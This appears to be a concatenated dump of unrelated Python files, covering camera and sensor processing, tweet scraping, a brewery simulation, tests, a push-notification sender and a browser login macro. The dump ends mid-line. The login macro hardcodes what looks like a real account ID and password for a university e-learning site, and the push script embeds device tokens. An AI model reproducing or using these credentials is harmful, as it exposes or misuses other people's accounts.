self.debug_frame,\n )\n self.fps_cam.update()\n if cv2.waitKey(1) == ord(\"q\"):\n cv2.destroyAllWindows()\n 
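 # stop the FPS counters and report camera/NN throughput before exiting\n 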
self.fps_cam.stop()\n self.fps_nn.stop()\n print(\n f\"FPS_CAMERA: {self.fps_cam.fps():.2f} , FPS_NN: {self.fps_nn.fps():.2f}\"\n )\n raise StopIteration()\n\n def parse_fun(self):\n pass\n\n def run_video(self):\n cap = cv2.VideoCapture(str(Path(self.file).resolve().absolute()))\n while cap.isOpened():\n read_correctly, self.frame = cap.read()\n if not read_correctly:\n break\n\n try:\n self.parse()\n except StopIteration:\n break\n\n cap.release()\n\n def run_camera(self):\n while True:\n in_rgb = self.preview.tryGet()\n if in_rgb is not None:\n self.frame = in_rgb.getCvFrame()\n try:\n self.parse()\n except StopIteration:\n break\n\n @property\n def cam_size(self):\n return self._cam_size\n\n @cam_size.setter\n def cam_size(self, v):\n self._cam_size = v\n\n def run(self):\n self.fps_cam.start()\n self.fps_nn.start()\n if self.file is not None:\n self.run_video()\n else:\n self.run_camera()\n del self.device\n","sub_path":"fire_detection/depthai_utils/depthai_0021.py","file_name":"depthai_0021.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"234183649","text":"# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport funcs as func\nimport config as conf\n\nfile = conf.init()\n\n\ndef getSecTime(df, step):\n secDf = pd.DataFrame(\n columns=[\"timeStamp\", \"s1\", \"s2\", \"s3\", \"s4\", \"s5\", \"s6\", \"time\"])\n baseSec = df.ix[0, \"timeStamp\"].timestamp()\n for i, row in df.iterrows():\n if i % step != 0:\n continue\n arr = []\n arr.append(row[\"timeStamp\"])\n for idx in range(6):\n arr.append(row[idx])\n arr.append(row[\"timeStamp\"].timestamp() - baseSec)\n secDf.loc[i] = arr\n return secDf\n\n# do calibration\n\n\ndef calibrate(df):\n caliDf = pd.DataFrame(\n columns=[\"s1\", \"s2\", \"s3\", \"s4\", \"s5\", \"s6\", \"timeStamp\"])\n baseData = df.ix[0]\n baseDataArr = baseData[1:7]\n\n # print(baseDataArr)\n size = len(baseDataArr)\n\n for i, row in df.iterrows():\n caliArr = []\n for idx in range(size):\n caliArr.append(int(row[idx + 1]) - int(baseDataArr[idx]))\n if caliArr[idx] < 0:\n caliArr[idx] = 0\n caliArr.append(row[\"timeStamp\"])\n caliDf.loc[i] = caliArr\n return caliDf\n\n''' calculating posture '''\n\n\ndef calcPosture(df):\n dfPosture = pd.DataFrame(\n columns=[\"posture-F(s1,s2)\", \"posture-C(s3,s4)\", \"posture-R(s5,s6)\", \"timeStamp\"])\n for i, row in df.iterrows():\n calcArr = []\n for idx in range(0, 5, 2):\n calcArr.append(row[idx] + row[idx + 1])\n calcArr.append(row[\"timeStamp\"])\n dfPosture.loc[i] = calcArr\n return dfPosture\n\n''' calculating movement '''\n\n\ndef calcMovement(df):\n dfMov = pd.DataFrame(columns=[\"value\", \"timeStamp\"])\n for i, row in df.iterrows():\n calcArr = []\n if i < 1:\n preArr = df.ix[i]\n dfMov.loc[i] = [0, row[\"timeStamp\"]]\n continue\n for idx in range(6):\n calcArr.append(abs(int(row[idx]) - int(preArr[idx])))\n\n s = pd.Series(calcArr)\n dfMov.loc[i] = [s.mean(), row[\"timeStamp\"]]\n preArr = df.ix[i]\n return dfMov\n\ndf = pd.read_csv(file, parse_dates=['timeStamp'])\ntime = getSecTime(df, 1)\ncaliDf = calibrate(df)\nposDf = calcPosture(caliDf)\nmovDf = calcMovement(caliDf)\n\n
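# movement is the mean absolute change of the six sensor channels between\n# consecutive samples, i.e. a per-sample activity score\n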
\nfig, axes = plt.subplots(nrows=2, ncols=1)\n\nposDf.plot(figsize=(10, 5), ax=axes[0], color=[\n \"#000066\", \"blue\", \"#00CCFF\"]) # shades of blue\naxes[0].set_title(\"posture\", fontsize=18)\naxes[0].set_xlabel('time[s]', fontname='Times New Roman', fontsize=15)\naxes[0].set_ylabel('value', fontname='Times New Roman', fontsize=15)\naxes[0].grid(True)\naxes[0].set_ylim([0, 1600]) # set the y-axis upper limit to 1600\naxes[0].legend(fontsize=10)\n# subplots_adjust(right=0.7)\n\n# second graph\nmovDf.plot(figsize=(10, 5), ax=axes[1], color=\"blue\")\naxes[1].set_title(\"movement\", fontsize=18)\naxes[1].set_xlabel('time[s]', fontname='Times New Roman', fontsize=15)\naxes[1].set_ylabel('value', fontname='Times New Roman', fontsize=15)\naxes[1].set_ylim([0, 100]) # set the y-axis upper limit to 100\naxes[1].grid(True)\n\nplt.tight_layout() # prevent the titles from overlapping\n\nprint(\"completed!!\")\nplt.show()\n\nprint(movDf)\n","sub_path":"python/assr_analyze.py","file_name":"assr_analyze.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"153019643","text":"#%%\nimport os\nimport tweepy\nfrom janome import tokenizer, tokenfilter, analyzer\nfrom pathlib import Path\nimport xml.etree.ElementTree as ET\nimport time\n\n#%%\nfrom logging import getLogger, StreamHandler, DEBUG\nlogger = getLogger(__name__)\nlogger.setLevel(DEBUG)\nhandler = StreamHandler()\nhandler.setLevel(DEBUG)\nlogger.addHandler(handler)\nlogger.propagate = False\n\n#%%\nleaders = [\n \"AbeShinzo\", # Liberal Democratic Party, Shinzo Abe\n \"edanoyukio0531\", # Constitutional Democratic Party, Yukio Edano\n \"tamakiyuichiro\", # Democratic Party for the People, Yuichiro Tamaki\n \"gogoichiro\", # Japan Innovation Party, Ichiro Matsui\n \"shiikazuo\"] # Japanese Communist Party, Kazuo Shii\nfor leader in leaders:\n Path(\"get_tweets\\\\{0}\".format(leader)).mkdir(exist_ok=True)\n\n#%%\napi_key = os.environ.get(\"API_KEY\")\napi_secret = os.environ.get(\"API_SECRET\")\naccess_token = os.environ.get(\"ACCESS_TOKEN\")\naccess_token_secret = os.environ.get(\"ACCESS_TOKEN_SECRET\")\nauth = tweepy.OAuthHandler(api_key,api_secret)\nauth.set_access_token(access_token,access_token_secret)\napi = tweepy.API(auth)\n\n#%%\n\"\"\"\nt = tokenizer.Tokenizer()\nchar_filters = [analyzer.UnicodeNormalizeCharFilter(),\n analyzer.RegexReplaceCharFilter(r\"@[a-zA-Z\\d]*\",\"\"),\n analyzer.RegexReplaceCharFilter(r\"[#$]\",\"\"),\n analyzer.RegexReplaceCharFilter(r\"https?:[a-zA-Z\\d/\\.]*\",\"\")]\ntoken_filters = [tokenfilter.LowerCaseFilter()]\nt_analyzer = analyzer.Analyzer(char_filters,t,token_filters)\n\ndef get_wakati(text):\n if len(text)==0:\n return text\n wakati_text = \"\"\n for token in t_analyzer.analyze(text):\n wakati_text += token.base_form + \" \"\n return wakati_text[0:-1]\n\"\"\"\n#%%\ndef get_and_save_tweets(screen_name):\n logger.info(screen_name)\n with Path(\"get_tweets/{0}/tweets.xml\".format(screen_name)).open(\"a\",encoding=\"utf-8\") as f:\n c = tweepy.Cursor(api.user_timeline,screen_name=screen_name,exclude_replies=True,tweet_mode=\"extended\").items()\n f.write(\"\")\n i = 0\n while True:\n try:\n tweet = c.next()\n if (not tweet.retweeted) and ('RT @' not in tweet.full_text):\n logger.info(\"GET TWEET ID: {0}\".format(tweet.id))\n tweetElement = ET.Element(\"tweet\",id=str(tweet.id))\n text = get_display_text(tweet)\n textElement = ET.SubElement(tweetElement,\"text\")\n textElement.text = text\n \"\"\"\n wakati_text = get_wakati(text)\n if len(wakati_text)==0 :\n continue\n else:\n i = i + 1\n if i > 500:\n break\n wakatiElement = ET.SubElement(tweetElement,\"wakati\")\n wakatiElement.text=wakati_text\n \"\"\"\n tree = ET.ElementTree(tweetElement)\n tree.write(f,encoding=\"unicode\",xml_declaration=False)\n f.write(\"\")\n except tweepy.TweepError:\n time.sleep(60 * 15)\n continue\n except StopIteration:\n logger.warning(\"Fewer than 500 tweets were collected.\")\n break\n \ndef get_display_text(tweet):\n
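 # display_text_range gives the [start, end) span of the user-visible text\n s , e = 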
tuple(tweet.display_text_range)\n return tweet.full_text[s:e]\n\n#%%\nfor leader in leaders:\n get_and_save_tweets(leader)","sub_path":"get_tweets/get_tweets.py","file_name":"get_tweets.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297814210","text":"__author__ = 'coltonmcentee'\n\ndef parse_as_floats(tabbed_file_name):\n tabbed_file = open(tabbed_file_name, 'r')\n\n values = []\n for line in tabbed_file:\n if not line.startswith('#') and line != \"\":\n\n columns = line.split(\"\\t\");\n\n columns_number = tuple([float(c) for c in columns]) # list of tuples, not list of lists\n values.append(columns_number)\n\n return values","sub_path":"scripts/Tab.py","file_name":"Tab.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"651254207","text":"import os\nfrom tests.test_base import TestBase\nfrom pathlib import Path\nfrom ruamel.yaml import safe_load\nfrom capanno_utils.config import config\nfrom capanno_utils.helpers.get_paths import get_metadata_path\nfrom capanno_utils.validate_content import main\n\nclass TestValidateContent(TestBase):\n\n def test_validate_tool_metadata(self):\n self.update_tool_maps()\n with self.get_content_map_paths()['tool_maps'].open('r') as tm:\n tool_map_dict = safe_load(tm)\n base_path = config[os.environ['CONFIG_KEY']]['base_path']\n for identifier, values in tool_map_dict.items():\n path = base_path / values['path']\n\n tool_type = values['type']\n if tool_type == 'parent':\n if not 'common' in path.parts: # values[type] would be better test.\n raise ValueError(f\"Have a parent tool that is not in a common directory {path}\")\n meta_path = path\n else: # either a subtool or standalone tool.\n meta_path = get_metadata_path(path)\n main([str(meta_path), '-q'])\n return\n\n def test_validate_script_metadata(self):\n self.update_script_maps()\n script_map_path = self.get_content_map_paths()['script_maps']\n with script_map_path.open('r') as sm:\n script_map = safe_load(sm)\n base_path = config[os.environ['CONFIG_KEY']]['base_path']\n for script_identifier, script_values in script_map.items():\n metadata_path = base_path / get_metadata_path(Path(script_values['path']))\n main([str(metadata_path), '-q'])\n return\n\n\n def test_validate_workflow_metadata(self):\n self.update_workflow_maps()\n with self.get_content_map_paths()['workflow_maps'].open('r') as wm:\n workflow_map = safe_load(wm)\n base_path = config[os.environ['CONFIG_KEY']]['base_path']\n\n for workflow_identifier, workflow_values in workflow_map.items():\n metadata_path = base_path / get_metadata_path(workflow_values['path'])\n main([str(metadata_path), '-q'])\n return","sub_path":"tests/test_validate_all_metadata_in_maps.py","file_name":"test_validate_all_metadata_in_maps.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270765672","text":"\"\"\"Date with a specific timezone\nExamples:\n date_time.date_time(2018, 12, 6, 8, 54, 32, format_=fmt)\n date_time.time(manipulate=True, manipulation_type='SUB', format_=fmt,\n hours=1)\n date_time.time()\n\"\"\"\n\nfrom os import getenv\nfrom datetime import datetime, timedelta\nimport pytz\nfrom pytz import timezone\n\nfmt = '%Y-%m-%d %H:%M:%S %Z%z'\n\ntz = getenv('TIMEZONE', 'Africa/Lagos')\n\n\nclass DateTime(object):\n \"\"\"Generates datetime according to the 
timezone.\"\"\"\n def __init__(self, time_zone=None):\n self.UTC = pytz.utc\n self.time_zone = timezone(time_zone) if time_zone else self.UTC\n\n def date_time(self, *arg, format_=None):\n \"\"\"Process a specified Date time.\n Args:\n *arg: The date to be parse\n year (int): The Year\n month (int): The Month\n day (int): The day\n minute (int): The minute\n second (int): The Seconds\n format_:\n Returns:\n Datetime: Formatted output\n \"\"\"\n year, month, day, hour, minute, second = arg\n utc_dt = datetime(year,\n month,\n day,\n hour,\n minute,\n second,\n tzinfo=self.UTC)\n loc_dt = utc_dt.astimezone(self.time_zone)\n return self._output(loc_dt, format_)\n\n def _now(self):\n \"\"\"Generate the current datetime.\n Returns:\n Datetime: The date time.\n \"\"\"\n now = datetime.now()\n local_dt = now.astimezone(self.time_zone)\n return local_dt\n\n def _date_manipulation(self, now, type_='ADD', **kwargs):\n \"\"\"Performs all date time manipulations on the provided datetime.\n Args:\n now (func): The date time to add to it.\n type_ (str): Type of manipulation\n **kwargs:\n minutes\n hours\n seconds\n milliseconds\n Returns:\n Datetime: The resulting date time.\n \"\"\"\n dt = now()\n\n type_mapper = {\n 'ADD': dt + timedelta(**kwargs),\n 'SUB': dt - timedelta(**kwargs),\n }\n\n exists = type_mapper.get(type_)\n new_time = type_mapper[type_] if exists else type_mapper['ADD']\n local_dt_norm = self.time_zone.normalize(new_time)\n return local_dt_norm\n\n def _output(self, local_dt, format_=None):\n \"\"\"Outputs the date time.\n Args:\n local_dt (datetime): The local datetime\n format_ (str): Strftime Format string\n Returns:\n Datetime: Formatted date time.\n \"\"\"\n return local_dt.strftime(format_) if format_ else local_dt\n\n def time(self,\n manipulate=False,\n manipulation_type='ADD',\n format_=None,\n **kwargs):\n \"\"\"Returns the datetime.\n Args:\n manipulate (bool): Toggles the date manipulation\n manipulation_type (str): The manipulation type\n format_ (str): Strtftime format string\n **kwargs (unknown): Arguments for timedelta\n minutes\n hours\n seconds\n milliseconds\n Returns:\n Datetime: The resulting datetime\n \"\"\"\n\n mapper = {\n 'NOW':\n self._output(self._now(), format_),\n 'MANIPULATE':\n self._output(\n self._date_manipulation(self._now,\n type_=manipulation_type,\n **kwargs), format_)\n }\n\n return mapper['MANIPULATE'] if manipulate else mapper['NOW']\n\n\ndate_time = DateTime(tz)\n","sub_path":"src/utils/date_time.py","file_name":"date_time.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"356926243","text":"from brewer import Brewer\nfrom keg import Keg\nimport json\nimport logging\nimport time\n\nclass BDR:\n\n def __init__(self, simConfig):\n\n self.brewers = []\n self.distributors = []\n self.retailers = []\n self.time = 0 # time in hours\n self.timeStart = 0\n self.timeStop = 0 # set from config\n self.initialize(simConfig)\n self.logger = logging.getLogger('BDR')\n\n\n def validateBrewerConfig(self, cfg):\n\n checkKeys = ['Name','Latitude', 'Longitude', 'Kegs', 'Products','MaxInventoryVolume','KegFillPerHour']\n for key in cfg.keys():\n if key in checkKeys:\n checkKeys.remove(key)\n else:\n print('Brewer Config Error: {} not valid'.format(key))\n return False\n\n if not len(checkKeys) == 0:\n print('Brewer Config Error: Missing {}'.format(str(checkKeys)))\n return False\n\n # Validate Products\n for prod in cfg['Products']:\n prodKeys = 
['Name','BatchCapacity', 'BatchParameters']\n\n for key in prod:\n if key in prodKeys:\n prodKeys.remove(key)\n else:\n print('Brewer Product Config Error: {} not valid'.format(key))\n return False\n\n if not len(prodKeys) == 0:\n print('Brewer Product Config Error: Missing {}'.format(str(prodKeys)))\n return False\n\n checkKeys = ['malting','milling', 'mash', 'lautering', 'boil', 'separation', 'fermentation', 'maturation',\n 'cellaring', 'packaging']\n\n prodParams = prod['BatchParameters']\n for key in prodParams.keys():\n\n if key in checkKeys:\n checkKeys.remove(key)\n else:\n print('Brewer Batch Config Error: {} not valid'.format(key))\n return False\n\n if not len(checkKeys) == 0:\n print('Brewer Product Config Error: Missing {}'.format(str(checkKeys)))\n return False\n\n return True\n\n\n def loadBrewers(self, config):\n with open(config, 'r') as datafile:\n data = json.load(datafile)\n brewerList = data['Brewers']\n for bcfg in brewerList:\n if self.validateBrewerConfig(bcfg):\n self.brewers.append(Brewer(bcfg))\n\n\n def initialize(self, config):\n\n with open(config,'r') as dfile:\n data = json.load(dfile)\n\n self.timeStart = data['Simulation']['time_start']\n self.timeStop = data['Simulation']['time_stop']\n self.time = self.timeStart\n\n bcfg = self.loadBrewers(config)\n # dcfg = self.loadDistributorConfigs(config)\n # rcfg = self.loadRetailerConfigs(config)\n\n def run(self):\n\n tsteps = range(int(self.timeStart), int(self.timeStop)+1)\n\n for t in tsteps:\n self.time = t\n for brewer in self.brewers:\n brewer.update(t)\n time.sleep(0.01)\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--inputfile', required=True, help='Config File Input')\n parser.add_argument('-f', '--logfile', required=False, default='BDR.log', help='Log File Output (default BDR.log)')\n parser.add_argument('-l', '--loglevel', required=False, default='DEBUG', help='Log File Level (default DEBUG')\n\n args = parser.parse_args()\n\n logger = logging.getLogger('BDR')\n\n if args.loglevel == 'DEBUG':\n logger.setLevel(logging.DEBUG)\n elif args.loglevel == 'WARNING':\n logger.setLevel(logging.WARNING)\n elif args.loglevel == 'ERROR':\n logger.setLevel(logging.ERROR)\n elif args.loglevel == 'INFO':\n logger.setLevel(logging.INFO)\n else:\n logger.setLevel(logging.DEBUG)\n\n fh = logging.FileHandler(args.logfile)\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(logging.ERROR)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n Sim = BDR(args.inputfile)\n\n Sim.run()\n\n\n","sub_path":"python/BDRSimulation.py","file_name":"BDRSimulation.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"514042868","text":"import json\nimport requests\n\ndef speak(str):\n from win32com.client import Dispatch\n speak = Dispatch(\"SAPI.SpVoice\")\n speak.Speak(str)\n\n# speak(\"News for today\")\n\nif __name__=='__main__':\n # speak(\"News for today\")\n url=\"http://newsapi.org/v2/top-headlines?country=in&apiKey=47c2ca33ecd24419b753c88a9df9330d\"\n r=requests.get(url).text\n # print(r)\n data=json.loads(r)\n print(data[\"articles\"])\n arts=(data[\"articles\"])\n # 
for article in arts:\n # speak(article['title'])\n # speak(\"Next news is\")\n for i in arts:\n speak(i[\"title\"])\n speak(\"Next news is\")\n\n","sub_path":"Python/Akhbar padhke sunao.py","file_name":"Akhbar padhke sunao.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"466337595","text":"def build_docker(platform: str, docker_binary: str, registry: str) -> None:\n '\\n Build a container for the given platform\\n :param platform: Platform\\n :param docker_binary: docker binary to use (docker/nvidia-docker)\\n :param registry: Dockerhub registry name\\n :return: Id of the top level image\\n '\n tag = get_docker_tag(platform=platform, registry=registry)\n logging.info(\"Building container tagged '%s' with %s\", tag, docker_binary)\n cmd = [docker_binary, 'build', '-f', get_dockerfile(platform), '--build-arg', 'USER_ID={}'.format(os.getuid()), '--cache-from', tag, '-t', tag, 'docker']\n logging.info(\"Running command: '%s'\", ' '.join(cmd))\n check_call(cmd)\n image_id = _get_local_image_id(docker_binary=docker_binary, docker_tag=tag)\n if (not image_id):\n raise FileNotFoundError('Unable to find docker image id matching with {}'.format(tag))\n return image_id","sub_path":"Data Set/bug-fixing-5/fc102c34dddea8f6e7838c57e61c43dd7921b979--fix.py","file_name":"fc102c34dddea8f6e7838c57e61c43dd7921b979--fix.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"651661357","text":"#!/usr/bin/python\n\nimport randomfields\n\n\nlist_nu = [1, 1.5, 2]\nlist_lc = [0.05, 0.1, 0.5]\n#list_lc = [0.2]\nl = {'x':1, 'y':1, 'z':1}\nn = {'x':300, 'y':300, 'z':300}\n\nfor nu in list_nu:\n for lc in list_lc:\n name = 'matern3D_lc{lc}_nu{nu}'.format(lc=lc, nu=nu)\n my_rf = randomfields.MaternRandomField(name=name,correlation_length=lc,nu=nu,length=l,number_of_nodes=n,dim=3, seed=0)\n my_rf.simu(do_print=True)\n\n\n","sub_path":"clients/client_randomfields.py","file_name":"client_randomfields.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339128087","text":"#===============================================\n# Building a browser macro\n#===============================================\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\ndriver = webdriver.Chrome()\n\nurl = 'https://cyber.inhatc.ac.kr/Main.do?cmd=viewHome&userDTO.localeKey=ko'\n\n# Open the web browser and maximize the window\ndriver.get(url)\ndriver.maximize_window()\n\nprint(driver.window_handles)\ndriver.switch_to.window(driver.window_handles[1])\ndriver.close()\ndriver.switch_to.window(driver.window_handles[0])\n# Prepare an ActionChains object for controlling the driver\naction = ActionChains(driver)\ntime.sleep(1)\n\n# Enter the user ID\ndriver.find_element_by_css_selector(\"#id\").click()\ndriver.find_element_by_css_selector(\"#id\").send_keys('2019010')\n\n# Enter the password\ndriver.find_element_by_css_selector(\"#pw\").click()\ndriver.find_element_by_css_selector(\"#pw\").send_keys('aqua0405@')\n\ntime.sleep(1)\n
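# find_element_by_css_selector raises NoSuchElementException when the page\n# has not finished loading, hence the short sleeps above\n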
# Click the login button\ndriver.find_element_by_css_selector('.loginBtn').click()\n\nprint(driver.window_handles)\ndriver.switch_to.window(driver.window_handles[1])\ndriver.close()\ndriver.switch_to.window(driver.window_handles[0])\n\ndriver.find_element_by_css_selector('.ui-button.ui-widget.ui-state-default.ui-corner-all.ui-button-icon-only.ui-dialog-titlebar-close').click()\n\n#driver.close()","sub_path":"Automations/Crawling/이러닝_로그인.py","file_name":"이러닝_로그인.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"568773580","text":"from django.test import TestCase\n\nfrom animedb.models import *\nfrom .dummy_data import *\n\n\nclass AnimeDBModelTestCase(TestCase):\n def setUp(self):\n self.anime = Anime.objects.create(**dummy_anime1)\n self.cv = CharacterVoice.objects.create(**dummy_cv1)\n self.char = Character.objects.create(**dummy_char1)\n\n def test_anime_genre_relation(self):\n \"\"\"\n Check Many-to-Many relation between Anime and Genre\n \"\"\"\n genre = Genre.objects.create(name='이세계')\n self.anime.genres.add(genre)\n self.assertIn(genre, self.anime.genres.all())\n self.assertEqual(genre.name, self.anime.genres.get(name=genre.name).name)\n\n def test_character_cv_relation(self):\n \"\"\"\n Check ForeignKey relation between Character and CharacterVoice\n \"\"\"\n self.char.cv = self.cv\n self.char.save()\n self.assertEqual(self.char.cv.name, self.cv.name)\n self.assertIn(self.char, self.cv.character_set.all())\n\n def test_character_anime_relation(self):\n \"\"\"\n Check ForeignKey relation between Character and Anime\n \"\"\"\n self.char.anime = self.anime\n self.char.save()\n self.assertEqual(self.char.anime.title, self.anime.title)\n self.assertIn(self.char, self.anime.character_set.all())\n","sub_path":"animedb/tests/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"161163890","text":"# -*- coding: utf-8 -*-\r\nimport sys\r\nfrom PyQt5 import QtCore as Qc, QtGui as Qg, QtWidgets as Qw #(note 1)\r\nfrom PyQt5.QtCore import Qt\r\nimport myicon\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QLabel, QGraphicsOpacityEffect\r\nfrom PyQt5.QtGui import QIcon, QPixmap, QImage, QPainter\r\n\r\nclass PersonalIcon(Qw.QWidget):\r\n\r\n #----------------------------------------------\r\n # (internal) initialization\r\n #----------------------------------------------\r\n def __init__(self, parent, imgSize, image=None, text=None): # initialize the class\r\n\r\n super().__init__(parent) # call the parent class initializer (note 2)\r\n self.ui = myicon.Ui_Form()\r\n self.ui.setupUi(self)\r\n\r\n self.setImage(image, imgSize)\r\n self.setText(text)\r\n\r\n\r\n #----------------------------------------------\r\n # (internal) image setup\r\n #----------------------------------------------\r\n def setImage(self, image, imgSize):\r\n\r\n if image is not None:\r\n pixmap = QPixmap(image)\r\n self.ui.imgField.setPixmap(pixmap.scaled(imgSize, imgSize, aspectRatioMode=Qt.KeepAspectRatio))\r\n\r\n\r\n #----------------------------------------------\r\n # (internal) text setup\r\n #----------------------------------------------\r\n def setText(self, text):\r\n\r\n if text is not None:\r\n self.ui.textField.setText(text)\r\n\r\n\r\n #----------------------------------------------\r\n # (internal) opacity setup\r\n #----------------------------------------------\r\n def setOpacity(self, value):\r\n opacityEffect = QGraphicsOpacityEffect()\r\n opacityEffect.setOpacity(value)\r\n 
self.setGraphicsEffect(opacityEffect)\r\n","sub_path":"PersonalIcon.py","file_name":"PersonalIcon.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"440461293","text":"from flask import Flask\nfrom flask_pymongo import PyMongo\nfrom flask_cors import CORS\nfrom app.config import Config\n\nmongo = PyMongo()\ncors = CORS()\n\nresources = {\n r'*': {\n 'origin': '*'\n }\n}\n\ndef create_app():\n from app.main.routes import api_blueprint\n app = Flask(__name__)\n app.config.from_object(Config)\n mongo.init_app(app)\n cors.init_app(app)\n app.register_blueprint(api_blueprint)\n return app","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"187016359","text":"from rest_framework import viewsets\nfrom rest_framework import permissions\n\nfrom halemate_auth.models import User\nfrom halemate_auth.serializers.user import (\n UserSerializer,\n UserViewSerializer,\n UserUpdateSerializer,\n)\nfrom halemate_auth.permissions import (\n isVerified,\n NoPost,\n)\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.filter(registered_as='U')\n serializer_class = UserSerializer\n permission_classes = [permissions.IsAuthenticated, isVerified, NoPost]\n\n def get_queryset(self):\n return User.objects.filter(id=self.request.user.id).\\\n filter(registered_as='U')\n\n def get_serializer_class(self):\n serializer_class = self.serializer_class\n if self.request.method == 'GET':\n serializer_class = UserViewSerializer\n if self.request.method == 'PUT' or self.request.method == 'PATCH':\n serializer_class = UserUpdateSerializer\n return serializer_class\n","sub_path":"halemate_auth/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"268087666","text":"# -*- coding: utf-8 -*-\n'''\n\t\t @file: \n \t\t @date: \n\t\t @author: Carlos Adir (carlos.adir.leite@gmail.com)\n\t@description: Numerical integration algorithm via \n\n'''\n\nimport numpy as np\nimport aux\nimport sys\n\ndef Const(a, b, n, f):\n\tI = 0\n\th = (b-a)/n\n\tx = np.linspace(a, b, n)\n\ty = f(x)\n\tfor i in range(n-1):\n\t\tI += y[i]\n\tI *= h\n\treturn x, y, I\n\n\nif __name__ == \"__main__\":\n\tinp, img, show = aux.get_all(sys.argv)\n\ta, b, n, f = inp()\n\tx, y, I = Const(a, b, n, f.e)\n\tshow(I)\n\timg(a, b, n, f, x, y)\n","sub_path":"4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"578380320","text":"import time, os\nfrom apns import APNs, Frame, Payload\n\ncert_path = 'pushcert.pem'\n# key_path = '/Users/julianhulme/signifi_certs/privKey.pem'\n\napns = APNs(use_sandbox=True, cert_file=cert_path, key_file='')\n\n# Send a notification\n\n\ntoken_julz = \"4a584c09cc8a7292558bcccbd58b5db47a4d1cf90908c8dab23133083f5fc8b1\"\ntoken_david = \"adb3e77d04e982b7251f020d69dccbcdf4e8d1b05988b72c0737741b50c53279\"\ntoken_daniel = \"ebcec145d11a072b2f72c5cfd322651f35652e0704f4af471e7895b457bf8bd2\"\n\n \nsuccessPackage = {}\nsuccessPackage[\"alert\"] = \"what's up\"\n\nsuccessPackage[\"category\"] = \"COUNTER_CATEGORY\"\nsuccessPackage[\"cardAmountProcessed\"] = 100\nsuccessPackage[\"rewardsAmountProcessed\"] = 7000\naps = 
{\"aps\":successPackage}\n\n\n\n\n\n\n\n# alert = PayloadAlert(\"New notification\", action_loc_key = \"Click me\")\npayload = Payload(alert=\"hi julian\", custom=aps)\n\nresult = apns.gateway_server.send_notification(token_daniel, payload)\n\n\n","sub_path":"Notifi/push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"317124580","text":"###########################################################################\n# This file provides maintenance on the various language files\n# 1. Create new \"xx/cards_xx.json\" files that have entries ordered as:\n# a. the card_tag entries in \"cards_db.json\"\n# b. the group_tag entries as found in \"cards_db.json\"\n# c. the super group entries (grouping across all expansions\"\n# d. any unused entries existing in the file (assumed to be work in progress)\n#\n# 2. Create new \"sets_db.json\" and \"xx/cards_xx.json\" with entries sorted alphabetically\n#\n# All output is in the designated output directory. Original files are not overwritten.\n###########################################################################\n\nimport os\nimport os.path\nimport io\nimport codecs\nimport json\nfrom shutil import copyfile\nimport argparse\nimport collections\n\nLANGUAGE_DEFAULT = \"en_us\" # default language, which takes priority\nLANGUAGE_XX = \"xx\" # language for starting a translation\n\n\ndef get_lang_dirs(path):\n # Find all valid languages.\n languages = []\n for name in os.listdir(path):\n dir_path = os.path.join(path, name)\n if os.path.isdir(dir_path):\n cards_file = os.path.join(dir_path, \"cards_\" + name + \".json\")\n sets_file = os.path.join(dir_path, \"sets_\" + name + \".json\")\n if os.path.isfile(cards_file) and os.path.isfile(sets_file):\n languages.append(name)\n return languages\n\n\ndef get_json_data(json_file_path):\n print((\"reading 